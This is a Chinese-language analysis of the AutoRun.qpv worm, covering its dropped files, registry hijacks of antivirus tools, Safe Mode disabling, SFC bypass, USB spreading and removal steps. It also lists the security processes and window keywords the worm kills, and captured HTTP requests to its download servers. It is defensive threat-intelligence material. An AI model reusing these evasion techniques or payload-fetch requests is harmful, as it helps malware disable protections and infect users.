Worm.Win32.AutoRun.qpv,该病毒是蠕虫,病毒的图示为windows自动更新程式,诱骗用户点击运行。病毒运行后,隐藏自身,破坏系统正常SFC功能,更改系统档案操作许可权、删除系统档案、并用病毒档案替换正常的系统更新程式。
基本介绍
- 外文名:Worm.Win32.AutoRun.qpv
- 病毒类型:蠕虫病毒
- 公开範围:完全公开
- 危害等级 :4
- 档案长度:20,560 位元组
- 感染系统:Windows98以上版本
- 开发工具:Microsoft Visual C++ 6.0
- 病毒图示:windows自动更新程式,诱骗点击
- 清除方案:2个
病毒标籤
病毒名称: Worm.Win32.AutoRun.qpv
病毒类型: 蠕虫
档案 MD5: 3166743046C030B5E597E5FAE755C33F
公开範围: 完全公开
危害等级: 4
档案长度: 20,560 位元组
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
病毒描述
病毒遍历进程列表,搜寻并结束对其自身存在构成威胁的进程,隐藏打开Internet Explorer,通过远程写入在IE进程中创建病毒执行绪。病毒修改注册表启动项,达到开机自启动的目的、添加映像劫持项,使众多安全工具无法启动。病毒在各磁碟分区创建autorun.inf档案和病毒副本档案way.pif档案,达到自启动和随身碟传播的目的。病毒检测当前滑鼠位置的视窗是否含有对病毒有危险的信息,当出现病毒认为威胁它存在的信息是关闭此视窗。病毒连线网路更新自身,下载并运行大量其他病毒。
行为分析
本地行为
1、档案运行后生成以下档案
病毒替换的档案:
%System32%\dllcache\wuauclt.exe 20,560 位元组
%System32%\wuauclt.exe 20,560 位元组
病毒衍生的档案:
%System32%\dmdskmgrs.dll 594,432 位元组
%DriveLetter%\WAY.PIF 20,560 位元组
%DriveLetter%\AUTORUN.INF 147 位元组
%HomeDrive%\WAY.PIF 20,560 位元组
%HomeDrive%\AUTORUN.INF 147 位元组
系统原档案备份:
%DriveLetter%\tEM.tep 108,032 位元组
2、修改注册表
添加注册表项目:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
项:360rpt.EXE
值:c:\windows\system32\dllcache\wuauclt.exe
描述:映像劫持。
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
项:360safe.EXE
值:c:\windows\system32\dllcache\wuauclt.exe
描述:映像劫持。
注:被映像劫持的程式有"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe",在此不赘述。
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
项:internetnet
值:c:\windows\system32\wuauclt.exe
描述:自启动项
删除注册表项目:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
描述:禁止进入安全模式,进入安全模式蓝屏。
3、破坏系统正常的SFC功能,更改系统档案操作许可权。
病毒通过载入系统动态程式库sfc_os.dll,调用当中的函式,利用这些函式修改系统的档案合法性检测,使其在用病毒档案替换系统档案时windows不会提示系统档案被更改。
病毒通过通过cacls.exe命令更改以下档案访问控制权:
"c:\windows\system32\packet.dll"
"c:\windows\system32\pthreadVC.dll"
"c:\windows\system32\wpcap.dll"
"c:\windows\system32\drivers\npf.sys"
"c:\windows\system32\npptools.dll "
"c:\windows\system32\drivers\acpidisk.sys"
"c:\windows\system32\wanpacket.dll"
更改为对所有用户为完全控制。
注:SFC(系统档案检查器,这个工具在WIN3.X时代开始集成于微软作业系统,并正式出现在Windows 98下,它可以扫描所有受保护的系统档案验证系统档案完整性并用正确的Microsoft程式版本替换不正确的版本)
4、病毒企图躲避卡巴斯基的主动防御功能
病毒用更改系统时间和替换系统驱动躲避卡巴斯基的主动防御。
病毒通过载入其释放的驱动程式beep.sys(替换系统中原有的档案)来重置系统的ssdt来关闭卡巴的主动防御。
5、遍历进程列表结束进程
病毒遍历系统进程列表当发现以下进程是结束该进程。
"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、
"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、
"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、
"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、
"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、
"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、
"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、
"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、
"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe"
这些其中包含各大防毒软体的进程和系统自动更新进程。
6、在各盘符创建autorun.inf档案和病毒副本
病毒在各磁碟分区下创建autorun.inf档案和病毒副本档案,将autorun.inf中的打开命令和资源管理器命令指向为该磁碟分区的病毒副本档案。从而使用户打开磁碟分区时附带运行该病毒档案。还可以达到随身碟传播的目的。
7、获得视窗句柄结束视窗
病毒利用api函式获取当前滑鼠所在位置,获得该位置视窗句柄。若发现该视窗题栏文本中含有以下字元串,关闭该视窗。
"卫士"、"杀"、"NOD32"、"process"、"BD"、"瑞星"、"木马"、"绿鹰"、"点"、"Mcafee"、"检"、"Firewall"、"Virus"、"antiy"、"民"、"worm"、"SREng"、"清理"。
8、病毒循环检测
病毒通过一个死循环不断的执行5,6两个步骤。当发现病毒档案被删除时就会重新创建该档案。
网路行为
1、 病毒连线网路地址:
x.c***.com
update.heis****.cn
update.cpus****.com
CSC3-2004-crl.veri****.com
crl.verisign.com
2、 下载并运行大量其他病毒。
2[1].exe not-a-virus:AdWare.Win32.Cinmus.vmz
9[1].exe Trojan-GameThief.Win32.OnLineGames.tptg
1[1].exe Trojan-Downloader.Win32.Zlob.abgq
6[1].exe Trojan.Win32.Pakes.ljf
x[1].gif Worm.Win32.AutoRun.rjz
5[1].exe Trojan-Downloader.Win32.Agent.aksm
xx[1].exe 原病毒程式更新档案
3[1].exe Trojan-Downloader.Win32.Delf.epw
10[1].exe 网站排名工具条(广告件)
3、下载的病毒运行时的衍生档案
%System32%\drivers\npf.sys
%System32%\dllcache\wuauclt.exe
%System32%\dllcache\npptools.dll
%System32%\OLDE.tmp
%System32%\dmdskmgrs.dll
%System32%\htxvimes.dll
%System32%\lsaes.exe
%System32%\WanPacket.dll
%System32%\Packet.dll
%System32%\wpcap.dll
%System32%\wacclt.exe
%System32%\wuauclt.exe
%System32%\npptools.dll
%System32%\mprmsgse.axz
%System32%\dkmdskmgrs.dll
%Windir%\Kler\pbhealth.dll
%Windir%\LastGood\system32\npptools.dll
%HomeDrive%\Documents and Settings\All Users\「开始」选单\程式\启动\3.pif
桌面\A.PIF
%HomeDrive%\Documents and Settings\2.pif
%HomeDrive%\Documents and Settings\3.pif
%HomeDrive%\Documents and Settings\6.pif
%HomeDrive%\Documents and Settings\9.pif
%HomeDrive%\Documents and Settings\10.pif
%ProgramFiles%\Common Files\PushWare\Uninst.exe
%ProgramFiles%\Common Files\PushWare\cpush.dll
%ProgramFiles%\eff.pif
%ProgramFiles%\zzToolBar\IP.dat
%ProgramFiles%\zzToolBar\SearchEngineConfig
%ProgramFiles%\zzToolBar\Uninstall.exe
%ProgramFiles%\zzToolBar\uISGRLFile.dat
%ProgramFiles%\zzToolBar\ToolBand.dll
%ProgramFiles%\zzToolBar\Toolbar_bho.dll
%HomeDrive%\tEM.tep
注:由于此档案为病毒更新程式产生,此时system32目录下的wuauclt.exe已经是病毒,所以这个备份也是病毒。
%HomeDrive%\h.pif
%HomeDrive%\tttmm.tep
%HomeDrive%\HVVP.PIF
4、 病毒更新所发数据包
a.
GET /adsys/rankstat.htm?Install_stat&AgentID=-33554375&Uid=00000000000000000001$$00-0C-29-9D-6E-C3&Auth=D97A0C6F8EA1ED38 HTTP/1.1
User-Agent: ProxyDown
Host: update.heishatu.cn
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 21
Content-Type: text/html
Last-Modified: Wed, 23 May 2007 03:37:12 GMT
Accept-Ranges: bytes
ETag: "a24084a6eb9cc71:711"
X-Powered-By: ASP.NET
Server: Microsoft-IIS/4.0
Date: Tue, 28 Oct 2008 02:12:33 GMT
X-Cache: MISS from localhost
Connection: close
ok
b.
GET /cpush/version.txt HTTP/1.1
User-Agent: CPUSH_UPDATER
Host: update.cpushpop.com
Cache-Control: no-cache
HTTP/1.0 200 OK
Date: Tue, 28 Oct 2008 02:12:33 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT
ETag: "f100b7-6d-34404f80"
Accept-Ranges: bytes
Content-Length: 109
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from localhost
Connection: close
[common]
version=1,1,0,9
url=http://update.cpus****.com/cpush/cpush.dll
md5=7e3d08311b3c954197b4f05f044491c0
c.
GET /cpush/version.txt?version=1,1,0,9&uid=5EAF7213-7BE1-48D2-8C99-0020F68BF3FC HTTP/1.1
User-Agent: CPUSH_UPDATER
Host: update.cpushpop.com
Cache-Control: no-cache
HTTP/1.0 200 OK
Date: Tue, 28 Oct 2008 02:12:33 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT
ETag: "f100b7-6d-34404f80"
Accept-Ranges: bytes
Content-Length: 109
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from localhost
Connection: close
[common]
version=1,1,0,9
url=http://update.cpus****.com/cpush/cpush.dll
md5=7e3d08311b3c954197b4f05f044491c0
病毒简要流程如图:
注:%System32%是一个可变路径。病毒通过查询作业系统来决定当前System资料夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP快取变数
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程式默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
清除方案
1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应档案,恢复相关係统设定。
(1) 用Atool结束所有IE进程。
(2) 用Atool强制删除以下所有档案:
病毒原档案
%System32%\dllcache\wuauclt.exe
%System32%\wuauclt.exe
%System32%\dmdskmgrs.dll
%DriveLetter%\WAY.PIF
%DriveLetter%\AUTORUN.INF
%HomeDrive%\WAY.PIF %HomeDrive%\AUTORUN.INF
%HomeDrive%\tEM.tep
%System32%\drivers\npf.sys
%System32%\dllcache\wuauclt.exe
%System32%\dllcache\npptools.dll
%System32%\OLDE.tmp
%System32%\dmdskmgrs.dll
%System32%\htxvimes.dll
%System32%\lsaes.exe
%System32%\WanPacket.dll
%System32%\Packet.dll
%System32%\wpcap.dll
%System32%\wacclt.exe
%System32%\wuauclt.exe
%System32%\npptools.dll
%System32%\mprmsgse.axz
%System32%\dkmdskmgrs.dll
%Windir%\Kler\pbhealth.dll
%Windir%\LastGood\system32\npptools.dll
%HomeDrive%\Documents and Settings\All Users\「开始」选单\程式\启动\3.pif
桌面\A.PIF
%HomeDrive%\Documents and Settings\2.pif
%HomeDrive%\Documents and Settings\3.pif
%HomeDrive%\Documents and Settings\6.pif
%HomeDrive%\Documents and Settings\9.pif
%HomeDrive%\Documents and Settings\10.pif
%ProgramFiles%\Common Files\PushWare\Uninst.exe
%ProgramFiles%\Common Files\PushWare\cpush.dll
%ProgramFiles%\eff.pif
%ProgramFiles%\zzToolBar\IP.dat
%ProgramFiles%\zzToolBar\SearchEngineConfig
%ProgramFiles%\zzToolBar\Uninstall.exe
%ProgramFiles%\zzToolBar\uISGRLFile.dat
%ProgramFiles%\zzToolBar\ToolBand.dll
%ProgramFiles%\zzToolBar\Toolbar_bho.dll
%HomeDrive%\h.pif
%HomeDrive%\tttmm.tep
%HomeDrive%\HVVP.PIF
(3) 删除注册表中病毒添加的项
a. 将%Windir%\regedit.exe更改名称为**.exe。
b. 删除注册表下列各项
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]主键。
[KLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
项:internetnet
值:c:\windows\system32\wuauclt.exe
[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ]
项:CAdLogic Object
值:c:\program files\common files\pushware\cpush0.dll
[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ]
项:Info cache
值:c:\windows\kler\pbhealth.dll
[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ]
项:网站排名工具条BHO网站排名工具条
值:c:\program files\zztoolbar\toolbar_bho.dll
[HKLM\Software\Microsoft\Internet Explorer\Toolbar]
项:toolband.dll
值: c:\program files\zztoolbar\toolband.dll
c. 添加下列注册表项
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]
键值: 字元串: "DiskDrive"
(4) 恢复原系统档案
从乾净的系统中拷贝以下档案:
%System32%\dllcache\wuauclt.exe
%System32%\wuauclt.exe
